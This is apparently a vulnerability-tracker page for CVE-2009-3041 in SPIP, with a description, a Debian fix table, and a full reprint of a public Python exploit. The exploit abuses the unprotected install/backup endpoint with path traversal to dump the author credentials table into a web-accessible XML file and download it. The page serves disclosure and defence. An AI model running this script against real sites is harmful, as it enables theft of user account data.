CVE-2009-3041

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

SPIP 1.9 before 1.9.2i and 2.0.x through 2.0.8 does not use proper access control for (1) ecrire/exec/install.php and (2) ecrire/index.php, which allows remote attackers to conduct unauthorized activities related to installation and backups, as exploited in the wild in August 2009.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9448 webapps php verified python · 2 KB

Kernel_Panik · 2009-08-18

SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File

python exploit Source: Exploit-DB

#!/usr/bin/env python
# SPIP - Content Management System < 2.0.9 exploit
# https://www.securityfocus.com/bid/36008
# Author : Kernel_Panik
#

import urllib, urllib2
import cookielib
import sys

def send_request(urlOpener, url, post_data=None):
   request = urllib2.Request(url)
   url = urlOpener.open(request, post_data)
   return url.read()

def extract_hash(formulaire):
   return formulaire.split("<input name='hash' type='hidden' value='")[1].split("'")[0]


if len(sys.argv) < 3:
   print "SPIP < 2.0.9 exploit by Kernel_Panik\n\tUsage: python script.py <Base_url> <filename>"
   exit()

filename = sys.argv[2]
base_url = sys.argv[1]

cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))


formulaire = send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] First request sended..."

formulaire_data = {'action' : 'export_all',
                   'export[]' : 'spip_auteurs',
                   'hash' : extract_hash(formulaire),
                   'arg' : 'start,,../../../IMG/'+filename+'.xml,0,1.3'
                  }
formulaire_data = urllib.urlencode(formulaire_data)


send_request(urlOpener, base_url+"spip.php", formulaire_data)
print "[+] Formulaire content sended"


send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] Second request sended"


send_request(urlOpener, base_url+"ecrire/?exec=install&reinstall=non&transformer_xml=export_all&nom_sauvegarde=../../../IMG/"+filename)
print "[+] Last request sended"

xml_content = send_request(urlOpener, base_url+"IMG/"+filename+".xml")
print "[+] Xml file obtained"


result = open(filename+".xml", "w")
result.write(xml_content)
result.close()
print "[+] File saved "

# milw0rm.com [2009-08-18]

OS impact

Debian Fixed 4 releases

Version	Status	Fixed in
trixie	Fixed	`2.0.9-1`
sid	Fixed	`2.0.9-1`
forky	Fixed	`2.0.9-1`
bullseye	Fixed	`2.0.9-1`

References

https://security-tracker.debian.org/tracker/CVE-2009-3041

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.